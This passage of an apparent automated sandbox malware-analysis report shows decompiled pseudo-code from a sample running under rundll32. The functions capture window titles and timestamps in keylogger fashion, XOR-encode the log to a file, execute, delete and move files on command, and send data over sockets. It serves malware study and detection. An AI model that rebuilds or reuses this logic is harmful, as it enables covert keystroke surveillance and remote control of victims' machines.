                                                                                              							if(_t71 == 0) {
                                                                                              								HeapFree( *( *(_t101 + 0x14)), _t71, _t101);
                                                                                              							}
                                                                                              							if(_t106 != 0) {
                                                                                              								InterlockedExchangeAdd(_v28 + 0x40,  ~_t87);
                                                                                              							} else {
                                                                                              								goto L16;
                                                                                              							}
                                                                                              						} else {
                                                                                              							goto L16;
                                                                                              						}
                                                                                              						break;
                                                                                              						L16:
                                                                                              						_t90 = _v24;
                                                                                              						_t56 = _a12 - _t87;
                                                                                              						_v20 = _v20 + _t87;
                                                                                              						_a12 = _t56;
                                                                                              						_t100 = _t90 + 0x94;
                                                                                              					} while (_t56 > 0);
                                                                                              					return E04275AFE(_v8 ^ _t109);
                                                                                              				}
                                                                                              			}
























                                                                                              0x04274580
                                                                                              0x04274586
                                                                                              0x0427458d
                                                                                              0x04274596
                                                                                              0x04274599
                                                                                              0x0427459c
                                                                                              0x0427459f
                                                                                              0x042745a4
                                                                                              0x0427471d
                                                                                              0x042745aa
                                                                                              0x042745ab
                                                                                              0x042745b2
                                                                                              0x042745b6
                                                                                              0x042745be
                                                                                              0x042745c5
                                                                                              0x042745cc
                                                                                              0x042745d6
                                                                                              0x042745ff
                                                                                              0x042745d8
                                                                                              0x042745d8
                                                                                              0x042745e9
                                                                                              0x042745ee
                                                                                              0x042745f1
                                                                                              0x042745f4
                                                                                              0x042745f7
                                                                                              0x042745fa
                                                                                              0x042745fa
                                                                                              0x04274602
                                                                                              0x04274602
                                                                                              0x04274605
                                                                                              0x04274608
                                                                                              0x0427460b
                                                                                              0x04274612
                                                                                              0x0427461a
                                                                                              0x04274624
                                                                                              0x0427461c
                                                                                              0x0427461f
                                                                                              0x0427461f
                                                                                              0x0427462b
                                                                                              0x04274630
                                                                                              0x04274638
                                                                                              0x04274640
                                                                                              0x04274654
                                                                                              0x04274657
                                                                                              0x04274661
                                                                                              0x04274668
                                                                                              0x0427466f
                                                                                              0x04274676
                                                                                              0x0427467f
                                                                                              0x04274689
                                                                                              0x04274681
                                                                                              0x04274681
                                                                                              0x04274681
                                                                                              0x04274692
                                                                                              0x04274695
                                                                                              0x042746a1
                                                                                              0x042746b1
                                                                                              0x042746b8
                                                                                              0x042746c1
                                                                                              0x042746c1
                                                                                              0x042746c9
                                                                                              0x04274706
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042746cb
                                                                                              0x042746ce
                                                                                              0x042746d1
                                                                                              0x042746d3
                                                                                              0x042746d6
                                                                                              0x042746d9
                                                                                              0x042746df
                                                                                              0x042746f9
                                                                                              0x042746f9

                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 042745E3
                                                                                              • InterlockedExchangeAdd.KERNEL32(?,?), ref: 04274640
                                                                                              • WSASend.WS2_32(?,0000001C,00000001,?), ref: 04274676
                                                                                              • WSAGetLastError.WS2_32 ref: 04274681
                                                                                              • InterlockedDecrement.KERNEL32(00000028), ref: 04274699
                                                                                              • HeapFree.KERNEL32(?,00000000,00000000,00000000), ref: 042746C1
                                                                                              • InterlockedExchangeAdd.KERNEL32(-0000003D,?), ref: 04274706
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Interlocked$ExchangeHeap$AllocateDecrementErrorFreeLastSend
                                                                                              • String ID:
                                                                                              • API String ID: 319775435-0
                                                                                              • Opcode ID: 6cf4406a8449e3b81e3e87b1d52b056270d0dbe5a0257a0c00c487e7b8a33263
                                                                                              • Instruction ID: ca639e01f2fcdfa6e49fc02dfac84706928fa1ab041b9111be521e630e997582
                                                                                              • Opcode Fuzzy Hash: 6cf4406a8449e3b81e3e87b1d52b056270d0dbe5a0257a0c00c487e7b8a33263
                                                                                              • Instruction Fuzzy Hash: 49513DB1B1020AAFDB10DFA9D984BAAB7B8FF18304F104669E905E7640E771F955CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 91%
                                                                                              			E0425B2E0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				short _v532;
                                                                                              				short _v2580;
                                                                                              				struct _SYSTEMTIME _v2596;
                                                                                              				struct HWND__* _v2600;
                                                                                              				signed int _t35;
                                                                                              				intOrPtr _t38;
                                                                                              				struct HWND__* _t39;
                                                                                              				signed int _t43;
                                                                                              				intOrPtr _t45;
                                                                                              				intOrPtr* _t50;
                                                                                              				signed int _t67;
                                                                                              				signed int _t68;
                                                                                              				WCHAR* _t70;
                                                                                              				void* _t74;
                                                                                              				signed short* _t76;
                                                                                              				intOrPtr* _t77;
                                                                                              				intOrPtr* _t82;
                                                                                              				void* _t84;
                                                                                              				void* _t85;
                                                                                              				void* _t86;
                                                                                              				intOrPtr _t87;
                                                                                              				intOrPtr* _t89;
                                                                                              				intOrPtr* _t91;
                                                                                              				signed int _t93;
                                                                                              				signed int _t94;
                                                                                              				void* _t95;
                                                                                              
                                                                                              				_t35 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t35 ^ _t94;
                                                                                              				_t70 = __ecx;
                                                                                              				if(__ecx == 0) {
                                                                                              					L24:
                                                                                              					return E04275AFE(_v8 ^ _t94);
                                                                                              				}
                                                                                              				_t91 = __ecx;
                                                                                              				_t74 = __ecx + 2;
                                                                                              				do {
                                                                                              					_t38 =  *_t91;
                                                                                              					_t91 = _t91 + 2;
                                                                                              				} while (_t38 != 0);
                                                                                              				_t93 = _t91 - _t74 >> 1;
                                                                                              				if(_t93 < 1) {
                                                                                              					goto L24;
                                                                                              				}
                                                                                              				_t39 = GetForegroundWindow();
                                                                                              				_v2600 = _t39;
                                                                                              				GetWindowTextW(_t39,  &_v532, 0x101);
                                                                                              				_t89 =  *0x42a7adc; // 0x0
                                                                                              				if(_v2600 !=  *(_t89 + 8)) {
                                                                                              					L13:
                                                                                              					_t76 =  &_v532;
                                                                                              					_t12 = _t89 + 0xc; // 0xc
                                                                                              					_t84 = _t12 - _t76;
                                                                                              					asm("o16 nop [eax+eax]");
                                                                                              					do {
                                                                                              						_t43 =  *_t76 & 0x0000ffff;
                                                                                              						_t76 =  &(_t76[1]);
                                                                                              						 *(_t84 + _t76 - 2) = _t43;
                                                                                              					} while (_t43 != 0);
                                                                                              					_t77 =  &_v532;
                                                                                              					 *(_t89 + 8) = _v2600;
                                                                                              					_t85 = _t77 + 2;
                                                                                              					do {
                                                                                              						_t45 =  *_t77;
                                                                                              						_t77 = _t77 + 2;
                                                                                              					} while (_t45 != 0);
                                                                                              					if(_t77 != _t85) {
                                                                                              						E0427DEA0(_t89,  &_v2580, 0, 0x800);
                                                                                              						GetLocalTime( &_v2596);
                                                                                              						wsprintfW( &_v2580, L"\r\n\r\n[Title:%s]\r\n[Time:]%d-%d-%d  %d:%d:%d\r\n[Content:]",  &_v532, _v2596.wYear & 0x0000ffff, _v2596.wMonth & 0x0000ffff, _v2596.wDay & 0x0000ffff, _v2596.wHour & 0x0000ffff, _v2596.wMinute & 0x0000ffff, _v2596.wSecond & 0x0000ffff);
                                                                                              						_t95 = _t95 + 0x30;
                                                                                              						E0425B2E0(_t70,  &_v2580, _t89, _t93);
                                                                                              						_t89 =  *0x42a7adc; // 0x0
                                                                                              					}
                                                                                              					L19:
                                                                                              					if( *((char*)(_t89 + 0x20c)) != 0) {
                                                                                              						E0425B1A0(_t70);
                                                                                              						_t89 =  *0x42a7adc; // 0x0
                                                                                              					}
                                                                                              					if( *_t89 + _t93 > 0x400) {
                                                                                              						_t32 = _t89 + 0x416; // 0x416
                                                                                              						E0427DEA0(_t89, _t32, 0, 0x800);
                                                                                              						 *_t89 = 0;
                                                                                              					}
                                                                                              					_t33 = _t89 + 0x416; // 0x416
                                                                                              					lstrcatW(_t33, _t70);
                                                                                              					_t50 =  *0x42a7adc; // 0x0
                                                                                              					 *_t50 =  *_t50 + _t93;
                                                                                              					goto L24;
                                                                                              				}
                                                                                              				_t82 =  &_v532;
                                                                                              				_t8 = _t89 + 0xc; // 0xc
                                                                                              				_t67 = _t8;
                                                                                              				while(1) {
                                                                                              					_t86 =  *_t67;
                                                                                              					if(_t86 !=  *_t82) {
                                                                                              						break;
                                                                                              					}
                                                                                              					if(_t86 == 0) {
                                                                                              						L10:
                                                                                              						_t68 = 0;
                                                                                              						L12:
                                                                                              						if(_t68 == 0) {
                                                                                              							goto L19;
                                                                                              						}
                                                                                              						goto L13;
                                                                                              					}
                                                                                              					_t87 =  *((intOrPtr*)(_t67 + 2));
                                                                                              					if(_t87 !=  *((intOrPtr*)(_t82 + 2))) {
                                                                                              						break;
                                                                                              					}
                                                                                              					_t67 = _t67 + 4;
                                                                                              					_t82 = _t82 + 4;
                                                                                              					if(_t87 != 0) {
                                                                                              						continue;
                                                                                              					}
                                                                                              					goto L10;
                                                                                              				}
                                                                                              				asm("sbb eax, eax");
                                                                                              				_t68 = _t67 | 0x00000001;
                                                                                              				goto L12;
                                                                                              			}






























                                                                                              0x0425b2e9
                                                                                              0x0425b2f0
                                                                                              0x0425b2f4
                                                                                              0x0425b2fa
                                                                                              0x0425b4a9
                                                                                              0x0425b4b9
                                                                                              0x0425b4b9
                                                                                              0x0425b300
                                                                                              0x0425b302
                                                                                              0x0425b305
                                                                                              0x0425b305
                                                                                              0x0425b308
                                                                                              0x0425b30b
                                                                                              0x0425b312
                                                                                              0x0425b317
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425b31d
                                                                                              0x0425b32e
                                                                                              0x0425b336
                                                                                              0x0425b33c
                                                                                              0x0425b34b
                                                                                              0x0425b389
                                                                                              0x0425b389
                                                                                              0x0425b38f
                                                                                              0x0425b394
                                                                                              0x0425b396
                                                                                              0x0425b3a0
                                                                                              0x0425b3a0
                                                                                              0x0425b3a3
                                                                                              0x0425b3a6
                                                                                              0x0425b3ab
                                                                                              0x0425b3b6
                                                                                              0x0425b3bc
                                                                                              0x0425b3bf
                                                                                              0x0425b3c2
                                                                                              0x0425b3c2
                                                                                              0x0425b3c5
                                                                                              0x0425b3c8
                                                                                              0x0425b3d1
                                                                                              0x0425b3e5
                                                                                              0x0425b3f4
                                                                                              0x0425b43d
                                                                                              0x0425b443
                                                                                              0x0425b44c
                                                                                              0x0425b451
                                                                                              0x0425b451
                                                                                              0x0425b457
                                                                                              0x0425b45e
                                                                                              0x0425b462
                                                                                              0x0425b467
                                                                                              0x0425b467
                                                                                              0x0425b476
                                                                                              0x0425b47d
                                                                                              0x0425b486
                                                                                              0x0425b48e
                                                                                              0x0425b48e
                                                                                              0x0425b495
                                                                                              0x0425b49c
                                                                                              0x0425b4a2
                                                                                              0x0425b4a7
                                                                                              0x00000000
                                                                                              0x0425b4a7
                                                                                              0x0425b34d
                                                                                              0x0425b353
                                                                                              0x0425b353
                                                                                              0x0425b356
                                                                                              0x0425b356
                                                                                              0x0425b35c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425b361
                                                                                              0x0425b378
                                                                                              0x0425b378
                                                                                              0x0425b381
                                                                                              0x0425b383
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425b383
                                                                                              0x0425b363
                                                                                              0x0425b36b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425b36d
                                                                                              0x0425b370
                                                                                              0x0425b376
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425b376
                                                                                              0x0425b37c
                                                                                              0x0425b37e
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32 ref: 0425B31D
                                                                                              • GetWindowTextW.USER32(00000000,?,00000101), ref: 0425B336
                                                                                              • GetLocalTime.KERNEL32(?), ref: 0425B3F4
                                                                                              • wsprintfW.USER32 ref: 0425B43D
                                                                                              • lstrcatW.KERNEL32(00000416), ref: 0425B49C
                                                                                              Strings
                                                                                              • [Title:%s][Time:]%d-%d-%d %d:%d:%d[Content:], xrefs: 0425B437
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Window$ForegroundLocalTextTimelstrcatwsprintf
                                                                                              • String ID: [Title:%s][Time:]%d-%d-%d %d:%d:%d[Content:]
                                                                                              • API String ID: 67575802-2837871436
                                                                                              • Opcode ID: e943852db69ecfd9a68ca88ab4daf5f12fd723641093b147ca99f39b8379b5af
                                                                                              • Instruction ID: f1d89eedbb2825454521f2c36f5a908ba0a525b97725b0d77bb73cebfb842dc7
                                                                                              • Opcode Fuzzy Hash: e943852db69ecfd9a68ca88ab4daf5f12fd723641093b147ca99f39b8379b5af
                                                                                              • Instruction Fuzzy Hash: 7851D476B1021AABDB24DF68D884BFAB778FF19304F4444A5ED05A3540EB34BE84CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 60%
                                                                                              			E04254130(void* __ebx, void* __ecx, signed char* _a4, intOrPtr _a8) {
                                                                                              				char _v8;
                                                                                              				char _v12;
                                                                                              				signed int _t26;
                                                                                              
                                                                                              				_t26 = ( *_a4 & 0x000000ff) + 0xfffffffb;
                                                                                              				if(_t26 > 0xe) {
                                                                                              					L19:
                                                                                              					return _t26;
                                                                                              				} else {
                                                                                              					switch( *((intOrPtr*)(_t26 * 4 +  &M04254268))) {
                                                                                              						case 0:
                                                                                              							return E04254C20(__ebx, __ecx, __ecx, _t36, _t31 + 1);
                                                                                              							goto L20;
                                                                                              						case 1:
                                                                                              							__eax = __edx + 1;
                                                                                              							__eax = E042552C0(__ebx, __ecx, __edi, __edx + 1);
                                                                                              							_pop(__edi);
                                                                                              							_pop(__esi);
                                                                                              							return __eax;
                                                                                              							goto L20;
                                                                                              						case 2:
                                                                                              							__eax = __edx + 1;
                                                                                              							__eax = E042556D0(__ebx, __ecx, __edi, __esi, __edx + 1);
                                                                                              							_pop(__edi);
                                                                                              							_pop(__esi);
                                                                                              							return __eax;
                                                                                              							goto L20;
                                                                                              						case 3:
                                                                                              							_a8 = _a8 - 1;
                                                                                              							__eflags = _a8 - 1;
                                                                                              							__eax = __edx + 1;
                                                                                              							__eax = E04255910(__ebx, __ecx, __edi, __esi, __edx + 1, __edx + 1);
                                                                                              							_pop(__edi);
                                                                                              							_pop(__esi);
                                                                                              							return __eax;
                                                                                              							goto L20;
                                                                                              						case 4:
                                                                                              							goto L19;
                                                                                              						case 5:
                                                                                              							__eax = __edx + 1;
                                                                                              							__eax = E042550B0(__ecx, __edx + 1);
                                                                                              							_pop(__edi);
                                                                                              							_pop(__esi);
                                                                                              							return __eax;
                                                                                              							goto L20;
                                                                                              						case 6:
                                                                                              							__eax = E042556A0(__ecx);
                                                                                              							_pop(__edi);
                                                                                              							_pop(__esi);
                                                                                              							return __eax;
                                                                                              							goto L20;
                                                                                              						case 7:
                                                                                              							__edx + 1 = DeleteFileW(__edx + 1);
                                                                                              							goto L4;
                                                                                              						case 8:
                                                                                              							__edx + 1 = E04254E30(__ebx, __ecx, __edi, __esi, __edx + 1);
                                                                                              							L4:
                                                                                              							_v8 = 0x6d;
                                                                                              							goto L5;
                                                                                              						case 9:
                                                                                              							__eax =  *(__edx + 1);
                                                                                              							 *(__edi + 0x14) =  *(__edx + 1);
                                                                                              							__eax = E042557F0(__ebx, __ecx, __edi, __esi);
                                                                                              							_pop(__edi);
                                                                                              							_pop(__esi);
                                                                                              							return __eax;
                                                                                              							goto L20;
                                                                                              						case 0xa:
                                                                                              							__edx + 1 = E04254670(__ecx, __eflags, __edx + 1);
                                                                                              							_v12 = 0x70;
                                                                                              							goto L5;
                                                                                              						case 0xb:
                                                                                              							__esi = __edx + 1;
                                                                                              							__eax = lstrlenW(__esi);
                                                                                              							__eax =  &(__eax[0]);
                                                                                              							__eax = MoveFileW(__esi, __eax);
                                                                                              							_v8 = 0x72;
                                                                                              							L5:
                                                                                              							_push(__ecx);
                                                                                              							__ecx =  *((intOrPtr*)(__edi + 4));
                                                                                              							__eax =  &_v8;
                                                                                              							_push(0x3f);
                                                                                              							_push(1);
                                                                                              							_push( &_v8);
                                                                                              							__eax = E04251C60( *((intOrPtr*)(__edi + 4)));
                                                                                              							_pop(__edi);
                                                                                              							_pop(__esi);
                                                                                              							return __eax;
                                                                                              							goto L20;
                                                                                              						case 0xc:
                                                                                              							_push(5);
                                                                                              							goto L16;
                                                                                              						case 0xd:
                                                                                              							_push(0);
                                                                                              							L16:
                                                                                              							__eax = __edx + 1;
                                                                                              							__eax = ShellExecuteW(0, L"open", __edx + 1, 0, 0, ??);
                                                                                              							_pop(__edi);
                                                                                              							_pop(__esi);
                                                                                              							return __eax;
                                                                                              							goto L20;
                                                                                              						case 0xe:
                                                                                              							__edx + 1 = E042545E0(__ecx, __edx + 1);
                                                                                              							goto L19;
                                                                                              					}
                                                                                              				}
                                                                                              				L20:
                                                                                              			}






                                                                                              0x04254140
                                                                                              0x04254149
                                                                                              0x0425425d
                                                                                              0x04254262
                                                                                              0x0425414f
                                                                                              0x0425414f
                                                                                              0x00000000
                                                                                              0x04254164
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425419b
                                                                                              0x0425419f
                                                                                              0x042541a4
                                                                                              0x042541a5
                                                                                              0x042541a9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425420a
                                                                                              0x0425420e
                                                                                              0x04254213
                                                                                              0x04254214
                                                                                              0x04254218
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425421e
                                                                                              0x0425421e
                                                                                              0x04254220
                                                                                              0x04254224
                                                                                              0x04254229
                                                                                              0x0425422a
                                                                                              0x0425422e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042541ac
                                                                                              0x042541b0
                                                                                              0x042541b5
                                                                                              0x042541b6
                                                                                              0x042541ba
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042541ea
                                                                                              0x042541ef
                                                                                              0x042541f0
                                                                                              0x042541f4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425416b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04254194
                                                                                              0x04254171
                                                                                              0x04254171
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042541f7
                                                                                              0x042541fa
                                                                                              0x042541fd
                                                                                              0x04254202
                                                                                              0x04254203
                                                                                              0x04254207
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042541c1
                                                                                              0x042541c6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042541cd
                                                                                              0x042541d1
                                                                                              0x042541d7
                                                                                              0x042541dd
                                                                                              0x042541e3
                                                                                              0x04254176
                                                                                              0x04254176
                                                                                              0x04254177
                                                                                              0x0425417a
                                                                                              0x0425417e
                                                                                              0x04254180
                                                                                              0x04254182
                                                                                              0x04254183
                                                                                              0x04254188
                                                                                              0x04254189
                                                                                              0x0425418d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04254231
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04254250
                                                                                              0x04254233
                                                                                              0x04254237
                                                                                              0x04254242
                                                                                              0x04254248
                                                                                              0x04254249
                                                                                              0x0425424d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04254258
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425414f
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(?), ref: 0425416B
                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?), ref: 042541D1
                                                                                              • MoveFileW.KERNEL32(?,00000001), ref: 042541DD
                                                                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 04254242
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$DeleteExecuteMoveShelllstrlen
                                                                                              • String ID: open$r
                                                                                              • API String ID: 69973834-2967530574
                                                                                              • Opcode ID: 06ac7ad410a5e2eaab747e16a32f0b891acd698b7091c0f9e890094a524ec352
                                                                                              • Instruction ID: 06f260e573d03ce16c6a85d007c7abb5bb26a9f9c756a348ea462c23ef58f52e
                                                                                              • Opcode Fuzzy Hash: 06ac7ad410a5e2eaab747e16a32f0b891acd698b7091c0f9e890094a524ec352
                                                                                              • Instruction Fuzzy Hash: 4A31A537728119A6D200FEA8F844F9AF39CEBD9221F4083A7ED04C7141DA76B5A4C7E5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 82%
                                                                                              			E0425B1A0(intOrPtr* __ecx) {
                                                                                              				void* _v8;
                                                                                              				long _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				long _v20;
                                                                                              				void* _v24;
                                                                                              				void* __esi;
                                                                                              				intOrPtr _t21;
                                                                                              				intOrPtr _t25;
                                                                                              				signed char _t31;
                                                                                              				signed int _t36;
                                                                                              				void* _t37;
                                                                                              				void* _t41;
                                                                                              				long _t42;
                                                                                              				intOrPtr* _t46;
                                                                                              				void* _t49;
                                                                                              				void* _t51;
                                                                                              				void* _t53;
                                                                                              				void* _t54;
                                                                                              				void* _t55;
                                                                                              				intOrPtr* _t56;
                                                                                              				void* _t57;
                                                                                              				void* _t58;
                                                                                              				void* _t59;
                                                                                              				void* _t60;
                                                                                              				void* _t62;
                                                                                              
                                                                                              				_t21 =  *0x42a7adc; // 0x0
                                                                                              				_t56 = __ecx;
                                                                                              				_t41 = CreateFileW(_t21 + 0x20e, 0x40000000, 2, 0, 4, 0x80, 0);
                                                                                              				_v20 = 0;
                                                                                              				_v24 = _t41;
                                                                                              				if(GetFileSize(_t41, 0) < 0x3200000) {
                                                                                              					SetFilePointer(_t41, 0, 0, 2);
                                                                                              				}
                                                                                              				_t46 = _t56;
                                                                                              				_t54 = _t46 + 2;
                                                                                              				do {
                                                                                              					_t25 =  *_t46;
                                                                                              					_t46 = _t46 + 2;
                                                                                              					_t68 = _t25;
                                                                                              				} while (_t25 != 0);
                                                                                              				_t48 = _t46 - _t54 >> 1;
                                                                                              				_t42 = (_t46 - _t54 >> 1) + (_t46 - _t54 >> 1);
                                                                                              				_push(_t42);
                                                                                              				_v12 = _t42;
                                                                                              				_t60 = E04275B55(_t48, _t59, _t68);
                                                                                              				_t55 = 0;
                                                                                              				_v8 = _t60;
                                                                                              				if(_t42 > 0) {
                                                                                              					if(_t42 >= 0x20) {
                                                                                              						_t8 = _t60 - 1; // -1
                                                                                              						_t51 = _t8 + _t42;
                                                                                              						if(_t60 > _t56 - 1 + _t42 || _t51 < _t56) {
                                                                                              							_t36 = _t42 & 0x8000001f;
                                                                                              							if(_t36 < 0) {
                                                                                              								_t36 = (_t36 - 0x00000001 | 0xffffffe0) + 1;
                                                                                              							}
                                                                                              							asm("movaps xmm1, [0x429f990]");
                                                                                              							_t53 = _t42 - _t36;
                                                                                              							_t37 = _t60;
                                                                                              							_v16 = _t56 - _t60;
                                                                                              							_t42 = _v12;
                                                                                              							do {
                                                                                              								asm("movups xmm0, [esi+eax]");
                                                                                              								_t37 = _t37 + 0x20;
                                                                                              								asm("pxor xmm0, xmm1");
                                                                                              								asm("movups [eax-0x20], xmm0");
                                                                                              								asm("movups xmm0, [edi+edx+0x10]");
                                                                                              								_t55 = _t55 + 0x20;
                                                                                              								asm("pxor xmm0, xmm1");
                                                                                              								asm("movups [eax-0x10], xmm0");
                                                                                              							} while (_t55 < _t53);
                                                                                              							_t60 = _v8;
                                                                                              						}
                                                                                              					}
                                                                                              					if(_t55 < _t42) {
                                                                                              						_t49 = _t55 + _t60;
                                                                                              						_t58 = _t56 - _t60;
                                                                                              						_t62 = _t42 - _t55;
                                                                                              						do {
                                                                                              							_t31 =  *((intOrPtr*)(_t49 + _t58));
                                                                                              							_t49 = _t49 + 1;
                                                                                              							 *(_t49 - 1) = _t31 ^ 0x00000058;
                                                                                              							_t62 = _t62 - 1;
                                                                                              						} while (_t62 != 0);
                                                                                              						_t60 = _v8;
                                                                                              					}
                                                                                              				}
                                                                                              				_t57 = _v24;
                                                                                              				WriteFile(_t57, _t60, _t42,  &_v20, 0);
                                                                                              				CloseHandle(_t57);
                                                                                              				return E04275B0F(_t60);
                                                                                              			}




























                                                                                              0x0425b1a6
                                                                                              0x0425b1c5
                                                                                              0x0425b1ce
                                                                                              0x0425b1d0
                                                                                              0x0425b1da
                                                                                              0x0425b1e8
                                                                                              0x0425b1f1
                                                                                              0x0425b1f1
                                                                                              0x0425b1f7
                                                                                              0x0425b1f9
                                                                                              0x0425b200
                                                                                              0x0425b200
                                                                                              0x0425b203
                                                                                              0x0425b206
                                                                                              0x0425b206
                                                                                              0x0425b20d
                                                                                              0x0425b20f
                                                                                              0x0425b212
                                                                                              0x0425b213
                                                                                              0x0425b21e
                                                                                              0x0425b220
                                                                                              0x0425b222
                                                                                              0x0425b227
                                                                                              0x0425b230
                                                                                              0x0425b235
                                                                                              0x0425b23a
                                                                                              0x0425b23e
                                                                                              0x0425b246
                                                                                              0x0425b24b
                                                                                              0x0425b251
                                                                                              0x0425b251
                                                                                              0x0425b252
                                                                                              0x0425b25b
                                                                                              0x0425b261
                                                                                              0x0425b263
                                                                                              0x0425b266
                                                                                              0x0425b270
                                                                                              0x0425b270
                                                                                              0x0425b274
                                                                                              0x0425b277
                                                                                              0x0425b27b
                                                                                              0x0425b27f
                                                                                              0x0425b284
                                                                                              0x0425b287
                                                                                              0x0425b28b
                                                                                              0x0425b28f
                                                                                              0x0425b293
                                                                                              0x0425b293
                                                                                              0x0425b23e
                                                                                              0x0425b298
                                                                                              0x0425b29a
                                                                                              0x0425b29d
                                                                                              0x0425b2a1
                                                                                              0x0425b2a3
                                                                                              0x0425b2a3
                                                                                              0x0425b2a6
                                                                                              0x0425b2ab
                                                                                              0x0425b2ae
                                                                                              0x0425b2ae
                                                                                              0x0425b2b3
                                                                                              0x0425b2b3
                                                                                              0x0425b298
                                                                                              0x0425b2b6
                                                                                              0x0425b2c2
                                                                                              0x0425b2c9
                                                                                              0x0425b2de

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(-0000020E,40000000,00000002,00000000,00000004,00000080,00000000), ref: 0425B1C8
                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0425B1DD
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0425B1F1
                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 0425B2C2
                                                                                              • CloseHandle.KERNEL32(?), ref: 0425B2C9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CloseCreateHandlePointerSizeWrite
                                                                                              • String ID:
                                                                                              • API String ID: 1886887421-3916222277
                                                                                              • Opcode ID: a8511bf9756f678417bdb441e5bf93f5ac70151f9d4d54efb5375bf378b7e673
                                                                                              • Instruction ID: d1b4835391df5daab69d86ee18f3cf66e06ef3623a61aad59348b8c5be625897
                                                                                              • Opcode Fuzzy Hash: a8511bf9756f678417bdb441e5bf93f5ac70151f9d4d54efb5375bf378b7e673
                                                                                              • Instruction Fuzzy Hash: E4413971B103099BDB10DF78DC89BBDBBA4EF88208F158268E905A7191EB707D85C750
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 63%
                                                                                              			E042725A0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
                                                                                              				void* __esi;
                                                                                              				void* _t38;
                                                                                              				void* _t44;
                                                                                              				void* _t53;
                                                                                              				void* _t55;
                                                                                              				LONG* _t68;
                                                                                              				void* _t69;
                                                                                              				intOrPtr* _t77;
                                                                                              				void* _t80;
                                                                                              				LONG* _t81;
                                                                                              
                                                                                              				_t62 = __ebx;
                                                                                              				_t77 = __ecx;
                                                                                              				if( *((intOrPtr*)(__ecx + 0x54)) == 3) {
                                                                                              					L12:
                                                                                              					 *((intOrPtr*)(_t77 + 0x58)) = 1;
                                                                                              					SetLastError(0x139f);
                                                                                              					__eflags = 0;
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					E0426EC90(__ecx + 0x174);
